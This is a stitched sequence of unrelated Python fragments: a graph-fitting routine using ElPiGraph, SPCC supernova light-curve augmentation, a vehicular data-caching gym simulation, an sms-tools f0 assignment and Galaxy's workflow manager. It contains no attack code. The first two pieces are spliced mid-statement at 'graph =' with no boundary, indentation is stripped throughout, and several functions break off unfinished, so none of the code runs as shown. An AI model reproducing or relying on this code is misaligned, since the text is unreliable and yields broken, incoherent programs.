init: Optional[DataFrame] = None,
lam: Optional[Union[float, int]] = 0.01,
mu: Optional[Union[float, int]] = 0.1,
trimmingradius: Optional = np.inf,
initnodes: int = None,
device: str = "cpu",
seed: Optional[int] = None,
verbose: bool = True,
):
try:
import elpigraph
except Exception as e:
warnings.warn(
'ElPiGraph package is not installed \
\nPlease use "pip install git+https://github.com/j-bac/elpigraph-python.git" to install it'
)
X, use_rep = get_data(adata, use_rep, ndims_rep)
if seed is not None:
np.random.seed(seed)
if device == "gpu":
import cupy as cp
from .utils import cor_mat_gpu
from cuml.metrics import pairwise_distances
Curve = elpigraph.computeElasticPrincipalCircle(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
GPU=True,
verbose=verbose,
)
R = pairwise_distances(
cp.asarray(X.values), cp.asarray(Curve[0]["NodePositions"])
)
R = cp.asnumpy(R)
# Hard assignment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
else:
from .utils import cor_mat_cpu
from sklearn.metrics import pairwise_distances
Curve = elpigraph.computeElasticPrincipalCircle(
X.values.astype(np.float64),
NumNodes=Nodes,
Do_PCA=False,
InitNodes=initnodes,
Lambda=lam,
Mu=mu,
TrimmingRadius=trimmingradius,
verbose=verbose,
)
R = pairwise_distances(X.values, Curve[0]["NodePositions"])
# Hard assignment
R = sparse.csr_matrix(
(np.repeat(1, R.shape[0]), (range(R.shape[0]), R.argmin(axis=1))), R.shape
).A
g = igraph.Graph(directed=False)
g.add_vertices(np.unique(Curve[0]["Edges"][0].flatten().astype(int)))
g.add_edges(
pd.DataFrame(Curve[0]["Edges"][0]).astype(int).apply(tuple, axis=1).values
)
# mat = np.asarray(g.get_adjacency().data)
# mat = mat + mat.T - np.diag(np.diag(mat))
# B=((mat>0).astype(int))
B = np.asarray(g.get_adjacency().data)
emptynodes = np.argwhere(R.max(axis=0) == 0).ravel()
sel = ~np.isin(np.arange(R.shape[1]), emptynodes)
B = B[sel, :][:, sel]
R = R[:, sel]
F = Curve[0]["NodePositions"].T[:, sel]
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
def reconnect():
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
distmat = np.triu(pairwise_distances(F[:, tips].T))
distmat = pd.DataFrame(distmat, columns=tips, index=tips)
distmat[distmat == 0] = np.inf
row, col = np.unravel_index(np.argmin(distmat.values), distmat.shape)
i, j = distmat.index[row], distmat.columns[col]
B[i, j] = 1
B[j, i] = 1
return B
if len(emptynodes) > 0:
logg.info(" removed %d non assigned nodes" % (len(emptynodes)))
recon = len(tips) > 0
while recon:
B = reconnect()
g = igraph.Graph.Adjacency((B > 0).tolist(), mode="undirected")
tips = np.argwhere(np.array(g.degree()) == 1).flatten()
recon = len(tips) > 0
forks = np.argwhere(np.array(g.degree()) > 2).flatten()
graph =
"""
photoz_reference = SPCC_SN_data().get_photoz_reference()
while True:
ref_idx = np.random.choice(len(photoz_reference))
ref_specz, ref_photoz, ref_photoz_err = photoz_reference[ref_idx]
# Randomly choose the order for the difference. Degeneracies work
# both ways, so even if we only see specz=0.2 -> photoz=3.0 in the
# data, the reverse also happens, but we can't get spec-zs at z=3
# so we don't see this.
new_diff = (ref_photoz - ref_specz) * np.random.choice([-1, 1])
# Apply the difference, and make sure that the photoz is > 0.
new_photoz = redshift + new_diff
if new_photoz < 0:
continue
# Add some noise to the error so that the classifier can't focus in
# on it.
new_photoz_err = ref_photoz_err * np.random.normal(1, 0.05)
break
return new_photoz, new_photoz_err
def _choose_target_observation_count(self, augmented_metadata):
"""Choose the target number of observations for a new augmented light
curve.
Implemented for the SPCC dataset
Parameters
==========
augmented_metadata : dict
The augmented metadata
Returns
=======
target_observation_count : int
The target number of observations in the new light curve.
"""
# the number of light-curve observations in SPCC is modelled well by a two-component Gaussian mixture
gauss_choice = np.random.choice(2, p=[0.25,0.75])
if gauss_choice == 0:
mu = 51
sigma = 15
elif gauss_choice == 1:
mu = 110
sigma = 24
target_observation_count = int(np.clip(np.random.normal(mu, sigma), 16, None)) # choose 16 as this is the minimum number of observations in a SPCC light curve
return target_observation_count
def _simulate_light_curve_uncertainties(self, observations, augmented_metadata):
"""Simulate the observation-related noise for a light curve.
Implemented for the SPCC dataset
Parameters
==========
observations : pandas.DataFrame
The augmented observations that have been sampled from a Gaussian
Process. These observations have model flux uncertainties listed
that should be included in the final uncertainties.
augmented_metadata : dict
The augmented metadata
Returns
=======
observations : pandas.DataFrame
The observations with uncertainties added.
"""
observations = observations.copy()
band_noises = {'desg': (1.459, 0.889), 'desr': (0.807, 0.891), 'desi': (1.305, 0.801), 'desz': (1.285, 0.737)}
# Calculate the new noise levels using a lognormal distribution for
# each band.
lognormal_parameters = np.array([band_noises[i] for i in observations['band']])
add_stds = np.random.lognormal(lognormal_parameters[:, 0], lognormal_parameters[:, 1])
noise_add = np.random.normal(loc=0.0, scale=add_stds)
observations['flux'] += noise_add
observations['flux_error'] = np.sqrt(observations['flux_error']**2 + add_stds**2)
# for not including GP error:
#observations['flux_error'] = abs(add_stds)
return observations
def _simulate_detection(self, observations, augmented_metadata):
"""Simulate the detection process for a light curve.
Parameters
==========
observations : pandas.DataFrame
The augmented observations that have been sampled from a Gaussian
Process.
augmented_metadata : dict
The augmented metadata
Returns
=======
observations : pandas.DataFrame
The observations with the detected flag set.
pass_detection : bool
Whether or not the full light curve passes the detection thresholds
used for the full sample.
"""
s2n = np.abs(observations['flux']) / observations['flux_error']
prob_detected = (erf((s2n - 5.5) / 2) + 1) / 2.
observations['detected'] = np.random.rand(len(s2n)) < prob_detected
pass_detection = np.sum(observations['detected']) >= 2
return observations, pass_detection
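# Illustrative values for the detection model above (derived from the erf formula,
# not from the data): the per-point detection probability is 0.5 at S/N = 5.5,
# about 0.92 at S/N = 7.5 and about 0.08 at S/N = 3.5; a light curve passes the
# sample cuts if at least two points are flagged as detected.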
def _choose_sampling_times(self, reference_object, augmented_metadata, max_time_shift=50, window_padding=100, drop_fraction=0.1):
"""Choose the times at which to sample for a new augmented object.
Implemented for the SPCC dataset. No need to drop large observation blocks.
Parameters
==========
reference_object : :class:`AstronomicalObject`
The object to use as a reference for the augmentation.
augmented_metadata : dict
The augmented metadata
max_time_shift : float (optional)
The new sampling times will be shifted by up to this amount
relative to the original ones.
window_padding : float (optional)
Observations outside of a window bounded by the first and last
observations in the reference objects light curve with a padding
specified by this parameter will be dropped.
drop_fraction : float (optional)
This fraction of observations will always be dropped when creating
the augmented light curve.
Returns
=======
sampling_times : pandas Dataframe
A pandas Dataframe that has the following columns:
- time : the times of the simulated observations.
- band : the bands of the simulated observations.
- reference_time : the times in the reference light curve that
correspond to the times of the simulated observations.
"""
# Figure out the target number of observations to have for the new
# lightcurve.
target_observation_count = self._choose_target_observation_count(augmented_metadata)
# Start with a copy of the original times and bands.
reference_observations = reference_object.observations
sampling_times = reference_observations[['time', 'band']].copy()
sampling_times['reference_time'] = sampling_times['time'].copy()
start_time = np.min(sampling_times['time'])
end_time = np.max(sampling_times['time'])
# If the redshift changed, shift the time of the observations.
augmented_redshift = augmented_metadata['redshift']
reference_redshift = reference_object.metadata['host_specz']
redshift_scale = (1 + augmented_redshift) / (1 + reference_redshift)
if augmented_redshift != reference_redshift:
# Shift relative to an approximation of the peak flux time so that
# we generally keep the interesting part of the light curve in the
# frame.
ref_peak_time = reference_observations['time'].iloc[np.argmax(reference_observations['flux'].values)]
sampling_times['time'] = (ref_peak_time + redshift_scale * (sampling_times['time'] - ref_peak_time))
# Shift the observations forward or backward in time by a small
# amount.
sampling_times['time'] += np.random.uniform(-max_time_shift, max_time_shift)
# Drop observations that are outside of the observing window after all
# of these procedures. We leave a bit of a buffer to get better
# baselines for background estimation.
sampling_times = sampling_times[(sampling_times['time'] > start_time - window_padding).values & (sampling_times['time'] < end_time + window_padding).values].copy()
# At high redshifts, we need to fill in the light curve to account for
# the fact that there is a lower observation density compared to lower
# redshifts.
num_fill = int(target_observation_count * (redshift_scale - 1))
if num_fill > 0:
new_indices = np.random.choice(sampling_times.index, num_fill, replace=True)
new_rows = sampling_times.loc[new_indices]
# Choose new bands randomly.
new_rows['band'] = np.random.choice(reference_object.bands, num_fill, replace=True)
sampling_times = pd.concat([sampling_times, new_rows])
# Drop back down to the target number of observations. Having too few
# observations is fine, but having too many is not. We always drop at
# least 10% of observations to get some shakeup of the light curve.
num_drop = int(max(len(sampling_times) - target_observation_count, drop_fraction * target_observation_count))
drop_indices = np.random.choice(sampling_times.index, num_drop, replace=False)
sampling_times = sampling_times.drop(drop_indices).copy()
sampling_times.reset_index(inplace=True, drop=True)
return sampling_times
def _resample_light_curve(self, reference_object, augmented_metadata):
"""Resample a light curve as part of the augmenting procedure
This uses the Gaussian process fit to a light curve to generate new
simulated observations of that light curve.
In some cases, the light curve that is generated will be accidentally
shifted out of the frame, or otherwise missed. If that is the case, the
light curve will automatically be regenerated with the same metadata
until it is either detected or until the number of tries has exceeded
settings['augment_retries'].
Parameters
----------
reference_object : :class:`AstronomicalObject`
The object to use as a reference for the augmentation.
augmented_metadata : dict
The augmented metadata
Returns
-------
augmented_observations : pandas.DataFrame
The simulated observations for the augmented object. If the chosen
metadata leads to an object that is too faint or otherwise unable
to be detected, None will be returned instead.
"""
gp = reference_object.get_default_gaussian_process()
# Figure out where to sample the augmented light curve at.
observations = self._choose_sampling_times(reference_object, augmented_metadata)
# Compute the fluxes from the GP at the augmented observation
# times.
new_redshift = augmented_metadata['redshift']
reference_redshift = reference_object.metadata['host_specz']
redshift_scale = (1 + new_redshift) / (1 + reference_redshift)
new_wavelengths = np.array([band_central_wavelengths[i] for i in observations['band']])
eval_wavelengths = new_wavelengths / redshift_scale
pred_x_data = np.vstack([observations['reference_time'], eval_wavelengths]).T
new_fluxes, new_fluxvars = gp(pred_x_data, return_var=True)
observations['flux'] = new_fluxes
observations['flux_error'] = np.sqrt(new_fluxvars)
# Update the brightness of the new observations. If the
# 'augment_brightness' key is in the metadata, we add that in
# magnitudes to the augmented object.
augment_brightness = augmented_metadata.get('augment_brightness', 0)
adjust_scale = 10**(-0.4*augment_brightness)
# All objects in spcc are extragalactic - adjust brightness following
# the Hubble diagram.
delta_distmod = (self.cosmology.distmod(reference_redshift) - self.cosmology.distmod(new_redshift)).value
adjust_scale *= 10**(0.4*delta_distmod)
observations['flux'] *= adjust_scale
observations['flux_error'] *= adjust_scale
# Save the model flux and flux error
observations['model_flux'] = observations['flux']
observations['model_flux_error'] = observations['flux_error']
# Add in light curve noise. This is survey specific and must be
# implemented in subclasses.
observations = self._simulate_light_curve_uncertainties(observations, augmented_metadata)
# Simulate detection
observations, pass_detection = self._simulate_detection(observations, augmented_metadata)
# If our light curve passes detection thresholds, we're done!
if pass_detection:
return observations
# Failed to pass the detection thresholds.
<filename>gym-dataCachingCoding/gym_dataCachingCoding/envs/simulation_entities.py<gh_stars>0
import numpy as np
import math
import scipy.io
#import matplotlib.pyplot as plot
#from matplotlib.animation import FuncAnimation
class Buffer_Object(object):
def __init__(self, size = 4, destinations = 5):
"""
This initialises a data buffer from which the sender will select jobs to transmit.
size: integer, the length of the buffer
destinations: integer, the number of possible recipients.
"""
self.size = size
self.destinations = destinations
self.data_packets = np.array([np.linspace(20,20,8),np.linspace(100,100,8)]) # Was np.linspace(200,200,8)
self.data_unit_size = 1 # size of one data unit
self.data_packets_num = self.data_packets / self.data_unit_size
self.data_deadline = np.array([np.linspace(2,2,8),np.linspace(20,20,8)]) #set deadlines corresponding to job size
#same as above but includes a 0 size item, to indicate no job to send
self.data = np.concatenate([np.array([0]),self.data_packets_num.flatten()])
self.fill_buffer(first_run = True)
# record lost jobs due to 'stays too long in the buffer'
#?
self.lost_table = []
# a parameter used in calculating deadline reward
self.ddl_reward_par = 8.0
def gen_item(self):
"""
This generates jobs and deadlines for adding to the buffer
p is the probability of the choice of different size packets
"""
row = np.random.choice([0,1], p = [0.5,0.5])
column = np.random.choice(list(range(8)))
return self.data_packets_num[row,column], self.data_deadline[row,column]
# def gen_deadline(self, data_size):
# """
# This generates deadlines given job size.
# """
# if data_size % 1000 == 0:
# ddl = 15.0 + data_size/1000 - 1
# elif data_size % 10 == 0:
# ddl = 5.0 + data_size/10 - 1
# return ddl
def fill_buffer(self, first_run = False):
"""
this fills the buffer
The items are appended with the following values
[size, dest, time_since_request, deadline]
Todo: figure out when to do this
"""
if first_run:
self.buffer = []
for i in range(self.size - len(self.buffer)):
dest = np.random.choice(list(range(self.destinations)))
size, deadline = self.gen_item()
self.buffer.append([size, dest, deadline, size])
# self.buffer.append([size,dest,0,deadline])
def view_buffer(self):
"""
This function provides an easier representation of the state to the agent.
np.vectorize (used by the commented-out v_scale below) allows a function to be applied to a numpy array;
v_scale mapped the 16 different job sizes, plus job size 0, to a value between 0 and 16.
The active code instead scales every buffer entry to [0, 1].
Possible change: use a binary encoding of the values instead.
"""
cp_buffer = np.array(self.buffer.copy()) #make a copy of the buffer so I don't corrupt it
cp_buffer = cp_buffer[:,0:3]
# v_scale = np.vectorize(lambda value: np.where(self.data == value)[0][0]) #vectorized function
#scale every item in the buffer to [0,1] - designed for multiple job sizes
cp_buffer[:,0] = cp_buffer[:,0] / np.max(self.data)
cp_buffer[:,1] = cp_buffer[:,1] / (self.destinations-1)
cp_buffer[:,2] = cp_buffer[:,2] / np.max(self.data_deadline.flatten())
# cp_buffer[:,3] = cp_buffer[:,3] / np.max(self.data_deadline.flatten())
# cp_buffer[:,4] = cp_buffer[:,4] / v_scale(cp_buffer[:,4]) / 16.0
return cp_buffer.flatten()
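# Illustrative shape of the returned state: each of the `size` buffer slots contributes
# 3 scaled entries (job size, destination, deadline), so the flattened vector has
# size*3 values in [0, 1] (e.g. 15 values for the size=5 buffer used by BaseStation).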
def update(self, job_finished, job_from, time_elapsed = 0.002 ):
"""
This function advances time for the buffered jobs (decrementing their remaining deadlines), removes jobs that have
finished transmission or exceeded their deadline, and refills the buffer.
-------
Later
Action: Update job in RAT
Time elapse
Deadline: remove
Refill buffer
"""
exceed_deadline = 0
finished_jobs = 0
#?
finished_job_size = []
exceed_deadline_size = []
to_remove = []
# update jobs in the buffer after transmission
for ii in range(len(job_from)):
idx = job_from[ii]
self.buffer[idx][0] -= 1
for i in range(len(self.buffer)): #iterate through buffer
self.buffer[i][2] -= time_elapsed #decrement the remaining deadline
if self.buffer[i][0] <= 0:
to_remove.append(i)
finished_jobs += 1
finished_job_size.append(self.buffer[i][3])
elif self.buffer[i][2] <= 0:
exceed_deadline += 1 #track that it's due to be removed
to_remove.append(i) #add it to a list to allow for removal at end of function
exceed_deadline_size.append(self.buffer[i][3]) # record size of jobs being removed
for i in to_remove[::-1]: #run backwards through the list of jobs to be removed. Backwards to avoid indexing error.
self.remove_item(i) #call removal function
self.fill_buffer() #refill the buffer
return finished_jobs, exceed_deadline, finished_job_size, exceed_deadline_size #report the number of jobs that exceeded deadline
def remove_item(self,i):
"""
Remove an item from the buffer, e.g. once it has finished transmission or exceeded its deadline.
"""
del self.buffer[i]
def to_be_removed(self, i):
"""
This function is used when a job has been successfully assigned. This is represented by the size being set to 0.
"""
self.buffer[i][0]=0
# def waiting_time_reward(self, waiting_time):
# """
# This is the penalization for job waited in the buffer (also in the RATs).
# Assume wating time is x, y is a constant for contronling the value
# r = -e^(x - y)
# y could be tuned
# """
# if waiting_time == 0:
# reward = 0
# else:
# reward = -0.5 * waiting_time
# # reward = -1.1**(waiting_time - self.ddl_reward_par)
# # reward = -math.exp(waiting_time - self.ddl_reward_par)
# return reward
class BaseStation(object):
def __init__(self, vehicles = 5, I2V = True):
if I2V:
self.buffer = Buffer_Object(size = 5)
self.vehicles = vehicles
self.RATs = {
0: {'job': [], 'free' : True, 'from': 999},
1: {'job': [], 'free' : True, 'from': 999},
}
self.load_RAT_spec()
self.time = 0.0
# record finished jobs:[size]; lost jobs: [size]
self.finished_table = []
self.lost_table_r = [] # lost jobs because of out of the range of RAT
self.lost_table_d = [] # lost jobs due to deadline
# cur_RATs: label = 0: start status; label = 1: finished; label = 2: lost
self.cur_RATs = {
0: {'job': []},
1: {'job': []},
}
def load_RAT_spec(self):
"""
Load the MATLAB lists which map distance to data rate into a dictionary
for easy access later.
"""
linkBudget_lte = scipy.io.loadmat('lte.mat')
lte = linkBudget_lte['lte']
linkBudget_mmWaves = scipy.io.loadmat('mmWaves.mat')
mmWaves = linkBudget_mmWaves['mmWaves']
# data rate: scaled to megabits (raw values divided by 1e6 below)
self.RAT_info = {
0:{'name':'LTE','dist': lte[0][0][0][0],
'datarate':lte[0][0][1][0]/ 1e6,'res':0,
'max_range': np.max(lte[0][0][0][0])},
1:{'name':'mmWave','dist': mmWaves[0][0][0][0],
'datarate':mmWaves[0][0][1][0]/ 1e6,'res':1,
'max_range': np.max(mmWaves[0][0][0][0])}
}
self.RAT_info[0]['data_index'] = np.concatenate([np.array([0]),np.unique(self.RAT_info[0]['datarate'])])
self.RAT_info[1]['data_index'] = np.concatenate([np.array([0]),np.unique(self.RAT_info[1]['datarate'])])
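# Illustrative lookup (the distance 100.0 is a made-up value): given a distance rounded
# to the RAT's resolution, the achievable rate is read from the loaded link-budget
# table, exactly as update_jobs does below (bs is a BaseStation instance):
#   d = np.round(100.0, bs.RAT_info[0]['res'])
#   rate = bs.RAT_info[0]['datarate'][np.where(bs.RAT_info[0]['dist'] == d)[0][0]]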
def add_job(self, RAT, index):
"""
Append job to RAT specified.
RAT: 0 or 1, either lte or mmwave
index: index of item in buffer
"""
row = index  # fallback for an action that matches no buffer destination (can happen in RL training; never needed by the heuristic method)
for idx in range(5):
if self.buffer.buffer[idx][1]== index:
row=idx
########### ERROR was here #############
item = self.buffer.buffer[row].copy() # instead of veh number it adds job to the row number ## was index
item[0] = 1 * self.buffer.data_unit_size # add one unit to RAT every time
success = False
if self.RATs[RAT]['free']:
self.RATs[RAT]['job'] = item
self.RATs[RAT]['from'] = index # where this unit comes from
self.RATs[RAT]['free'] = False
success = True
# add the job size for record
#?
self.cur_RATs[RAT]['job'] = self.RATs[RAT]['job'][0]
return success
def update(self, distances, time_elapsed = 0.002):
"""
This updates the base station entity. It does a number of things including update a time variable.
It updates the jobs progress in transmission (which includes checking for inability to send and
also checking if jobs in the buffer have exceeded the available time)
"""
self.time += time_elapsed
job_finished, job_from = self.update_jobs(distances, time_elapsed = time_elapsed)
finished_jobs, exceed_deadlines, finished_size, exceed_ddl_size = self.buffer.update(
job_finished, job_from, time_elapsed = time_elapsed)
return finished_jobs, exceed_deadlines, finished_size, exceed_ddl_size
def update_jobs(self, distances ,time_elapsed = 0.002):
"""
Transmit some of the data and then return the amount of data that has been transmitted
arguments:
distances - dictionary, an np.array of all of the distances to the vehicles, for LTE and mmWaves RATs.
time_elapsed - float, a real number. Time that has elapsed.
operation:
goes through the items in the RATs and calculates the amount of data that has been sent.
Things to consider:
One known limitation: it assumes the current data rate has applied over the whole elapsed interval. This should be changed.
"""
data_tx = {i:0 for i in range(self.vehicles)}
idx = 0
RATs=[1,0] #mmWave priority
#for i in self.RATs.keys():
for i in RATs:
if not self.RATs[i]['free']: #if the RAT isn't free there is a job
size_before = self.RATs[i]['job'][0] #the size of the job
dest = self.RATs[i]['job'][1] #the destination of the job
distance = np.round(distances[list(distances.keys())[idx]][dest],self.RAT_info[i]['res']) # distance rounded to the RAT's resolution
if distance > self.RAT_info[i]['max_range']: #if out of range
data_rate = 0 #there is no service, so the data rate is 0
self.RATs[i]['job'] = [] #therefore, we drop the job
self.RATs[i]['free'] = True #and change the status of the RAT
else: #in range
data_rate = self.RAT_info[i]['datarate'][np.where(self.RAT_info[i]['dist']==distance)[0][0]] # look up the data rate for this distance
<filename>A6/A6Part4.py<gh_stars>0
import os
import sys
import numpy as np
import math
from scipy.signal import get_window
import matplotlib.pyplot as plt
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../software/models/'))
import utilFunctions as UF
import harmonicModel as HM
import dftModel as DFT
import stft
eps = np.finfo(float).eps
"""
A6Part4 - Improving the implementation of the two way mismatch f0 estimation algorithm
Improve the performance of the current implementation of the two way mismatch algorithm in sms-tools
used for fundamental frequency estimation. This is an optional open question and will not contribute
towards the final grade. There is no definite answer for this question. Its main purpose is to
understand the limitations of the current implementations of the TWM algorithm and to come up with
some community driven solutions based on collective thinking.
In this question you will directly modify the core functions that implement the TWM algorithm in
sms-tools. To assist you with this task, we have copied all the needed functions into this python
file. Hence, you just need to modify the functions in this file and not anywhere else.
Estimating fundamental frequency from an audio signal is still a challenging and unsolved problem
to a large extent. By this time you might have also realized that many times the performance of the
TWM f0 estimation algorithm falls short of the expectations. There can be a systematic explanation
for the scenarios where TWM fails for specific categories or characteristics of the sounds. Some of
the known scenarios where the current implementation of the TWM algorithm fails to estimate a correct
fundamental frequency are:
1) Missing fundamental frequency: For many sounds the fundamental frequency component is very low and
therefore during the spectral peak picking step we do not obtain any peak corresponding to the f0.
Since the TWM algorithm implemented in sms-tools considers only the detected spectral peaks as the
f0 candidates, we do not get any candidate corresponding to the f0. This causes f0 estimation to fail.
For example, such a scenario is encountered in low pitched vocal sounds.
2) Pseudo-harmonicity in the sound. Many instruments such as piano exhibit some deviation from perfect
harmonicity wherein their harmonic partials are not perfectly located at integral multiples of the
fundamental frequency. Since the TWM algorithm computes error function assuming that the harmonic
locations are at integral multiples, its performance is poorer when such deviations exist.
In this question we propose to work on these two scenarios. Go to freesound and download sound examples
of low pitched vocal sounds and of piano. Run the current implementation of TWM to identify the limitations
and propose improvements to the code in order to obtain better f0 estimation for those two particular
scenarios.
The core TWM algorithm is implemented in the function TWM_p(), which takes in an array of f0 candidates
and detect the candidate that has the lowest error. TWM_p() is called by f0Twm(), which generates
f0 candidates (f0c = np.argwhere((pfreq>minf0) & (pfreq<maxf0))[:,0]). This function also implements
a memory-based pruning of the f0 candidates. If the f0 contour is found to be stable (no drastic
transitions across frames) then only the f0 candidates close to the stable f0 value are retained.
f0Twm() is called for every audio frame by f0Detection().
You can use computeAndPlotF0(), which calls f0Detection() for estimating f0 for every audio frame.
In addition, it also plots the f0 contour on the top of the spectrogram. If you set plot=1, it shows
the plot, plot=2 saves the plot as can be seen in the code.
Once you implement your proposed enhancement, discuss and share your ideas on the discussion forum
assigned for A6Part4 - https://class.coursera.org/audio-001/forum/list?forum_id=10026. Along with the
text you should include 2 plots showing the f0 contour before and after your changes. Use the same
values of the analysis parameters while showing the improvement in the performance. In the discussion,
also include a link to the sound in freesound.
TIP: An identified limitation of the current implementation for the case of low vocal sounds is that
it can only find f0 if there is a peak present in the magnitude spectrum. A possible improvement is
to generate additional f0 candidates from the identified peaks. Another identified limitation for
the case of piano sounds is the assumption of perfect harmonicity. For these sounds you can think
of modifying the generation of the ideal harmonic series that is computed in the code, incorporating
the typical deviation from harmonicity encountered in piano sounds.
NOTE: Before you start making changes in the TWM implementation make sure you have reached the best
possible performance that can be achieved by tuning the analysis parameters. If the analysis parameters
are inappropriately set, it is not completely meaningful to just improve the TWM implementation.
To maintain the integrity of the sms-tools package for future assignments, please make changes only
to the functions in this file and not the other files in sms-tools.
"""
def computeAndPlotF0(inputFile = '../../sounds/piano.wav'):
"""
Function to estimate fundamental frequency (f0) in an audio signal using TWM.
Input:
inputFile (string): wav file including the path
"""
window='hamming'
M=2048
N=2048
H=256
f0et=5.0
t=-80
minf0=100
maxf0=300
fs, x = UF.wavread(inputFile) #reading inputFile
w = get_window(window, M) #obtaining analysis window
f0 = f0Detection(x, fs, w, N, H, t, minf0, maxf0, f0et) #estimating F0
## Code for plotting the f0 contour on top of the spectrogram
# frequency range to plot
maxplotfreq = 500.0
fontSize = 16
plot = 1
fig = plt.figure()
ax = fig.add_subplot(111)
mX, pX = stft.stftAnal(x, w, N, H) #using same params as used for analysis
mX = np.transpose(mX[:,:int(N*(maxplotfreq/fs))+1])
timeStamps = np.arange(mX.shape[1])*H/float(fs)
binFreqs = np.arange(mX.shape[0])*fs/float(N)
plt.pcolormesh(timeStamps, binFreqs, mX)
plt.plot(timeStamps, f0, color = 'k', linewidth=1.5)
plt.autoscale(tight=True)
plt.ylabel('Frequency (Hz)', fontsize = fontSize)
plt.xlabel('Time (s)', fontsize = fontSize)
plt.legend(('f0',))
xLim = ax.get_xlim()
yLim = ax.get_ylim()
ax.set_aspect((xLim[1]-xLim[0])/(2.0*(yLim[1]-yLim[0])))
if plot == 1:
plt.autoscale(tight=True)
plt.show()
elif plot == 2: #you can save the plot too!
fig.tight_layout()
fig.savefig('f0_over_Spectrogram.png', dpi=150, bbox_inches='tight')
def f0Detection(x, fs, w, N, H, t, minf0, maxf0, f0et):
"""
Fundamental frequency detection of a sound using twm algorithm
x: input sound; fs: sampling rate; w: analysis window;
N: FFT size; t: threshold in negative dB,
minf0: minimum f0 frequency in Hz, maxf0: maximum f0 frequency in Hz,
f0et: error threshold in the f0 detection (ex: 5),
returns f0: fundamental frequency
"""
if (minf0 < 0): # raise exception if minf0 is smaller than 0
raise ValueError("Minumum fundamental frequency (minf0) smaller than 0")
if (maxf0 >= 10000): # raise exception if maxf0 is 10000 Hz or higher
raise ValueError("Maximum fundamental frequency (maxf0) bigger than 10000Hz")
if (H <= 0): # raise error if hop size 0 or negative
raise ValueError("Hop size (H) smaller or equal to 0")
hN = N//2 # size of positive spectrum
hM1 = int(math.floor((w.size+1)/2)) # half analysis window size by rounding
hM2 = int(math.floor(w.size/2)) # half analysis window size by floor
x = np.append(np.zeros(hM2),x) # add zeros at beginning to center first window at sample 0
x = np.append(x,np.zeros(hM1)) # add zeros at the end to analyze last sample
pin = hM1 # init sound pointer in middle of anal window
pend = x.size - hM1 # last sample to start a frame
fftbuffer = np.zeros(N) # initialize buffer for FFT
w = w / sum(w) # normalize analysis window
f0 = [] # initialize f0 output
f0t = 0 # initialize f0 track
f0stable = 0 # initialize f0 stable
while pin<pend:
x1 = x[pin-hM1:pin+hM2] # select frame
mX, pX = DFT.dftAnal(x1, w, N) # compute dft
ploc = UF.peakDetection(mX, t) # detect peak locations
iploc, ipmag, ipphase = UF.peakInterp(mX, pX, ploc) # refine peak values
ipfreq = fs * iploc/N # convert locations to Hz
f0t = f0Twm(ipfreq, ipmag, f0et, minf0, maxf0, f0stable) # find f0
if ((f0stable==0)&(f0t>0)) \
or ((f0stable>0)&(np.abs(f0stable-f0t)<f0stable/5.0)):
f0stable = f0t # consider a stable f0 if it is close to the previous one
<filename>lib/galaxy/managers/workflows.py<gh_stars>0
from __future__ import absolute_import
from collections import namedtuple
import json
from galaxy import model
from galaxy import exceptions
from galaxy.model.item_attrs import UsesAnnotations
from galaxy.workflow import modules
# For WorkflowContentManager
from galaxy.util.sanitize_html import sanitize_html
from galaxy.workflow.steps import attach_ordered_steps
from galaxy.workflow.modules import module_factory, is_tool_module_type, ToolModule
from galaxy.tools.parameters.basic import DataToolParameter, DataCollectionToolParameter
from galaxy.tools.parameters import visit_input_values
from galaxy.web import url_for
class WorkflowsManager( object ):
""" Handle CRUD type operaitons related to workflows. More interesting
stuff regarding workflow execution, step sorting, etc... can be found in
the galaxy.workflow module.
"""
def __init__( self, app ):
self.app = app
def check_security( self, trans, has_workflow, check_ownership=True, check_accessible=True):
""" check accessibility or ownership of workflows, storedworkflows, and
workflowinvocations. Throw an exception or returns True if user has
needed level of access.
"""
if not check_ownership and not check_accessible:
return True
# If given an invocation follow to workflow...
if isinstance( has_workflow, model.WorkflowInvocation ):
has_workflow = has_workflow.workflow
# stored workflow contains security stuff - follow that workflow to
# that unless given a stored workflow.
if hasattr( has_workflow, "stored_workflow" ):
stored_workflow = has_workflow.stored_workflow
else:
stored_workflow = has_workflow
if stored_workflow.user != trans.user and not trans.user_is_admin():
if check_ownership:
raise exceptions.ItemOwnershipException()
# else check_accessible...
if trans.sa_session.query( model.StoredWorkflowUserShareAssociation ).filter_by(user=trans.user, stored_workflow=stored_workflow ).count() == 0:
raise exceptions.ItemAccessibilityException()
return True
def get_invocation( self, trans, decoded_invocation_id ):
try:
workflow_invocation = trans.sa_session.query(
self.app.model.WorkflowInvocation
).get( decoded_invocation_id )
except Exception:
raise exceptions.ObjectNotFound()
self.check_security( trans, workflow_invocation, check_ownership=True, check_accessible=False )
return workflow_invocation
def cancel_invocation( self, trans, decoded_invocation_id ):
workflow_invocation = self.get_invocation( trans, decoded_invocation_id )
cancelled = workflow_invocation.cancel()
if cancelled:
trans.sa_session.add( workflow_invocation )
trans.sa_session.flush()
else:
# TODO: More specific exception?
raise exceptions.MessageException( "Cannot cancel an inactive workflow invocation." )
return workflow_invocation
def get_invocation_step( self, trans, decoded_workflow_invocation_step_id ):
try:
workflow_invocation_step = trans.sa_session.query(
model.WorkflowInvocationStep
).get( decoded_workflow_invocation_step_id )
except Exception:
raise exceptions.ObjectNotFound()
self.check_security( trans, workflow_invocation_step.workflow_invocation, check_ownership=True, check_accessible=False )
return workflow_invocation_step
def update_invocation_step( self, trans, decoded_workflow_invocation_step_id, action ):
if action is None:
raise exceptions.RequestParameterMissingException( "Updating workflow invocation step requires an action parameter. " )
workflow_invocation_step = self.get_invocation_step( trans, decoded_workflow_invocation_step_id )
workflow_invocation = workflow_invocation_step.workflow_invocation
if not workflow_invocation.active:
raise exceptions.RequestParameterInvalidException( "Attempting to modify the state of an completed workflow invocation." )
step = workflow_invocation_step.workflow_step
module = modules.module_factory.from_workflow_step( trans, step )
performed_action = module.do_invocation_step_action( step, action )
workflow_invocation_step.action = performed_action
trans.sa_session.add( workflow_invocation_step )
trans.sa_session.flush()
return workflow_invocation_step
def build_invocations_query( self, trans, decoded_stored_workflow_id ):
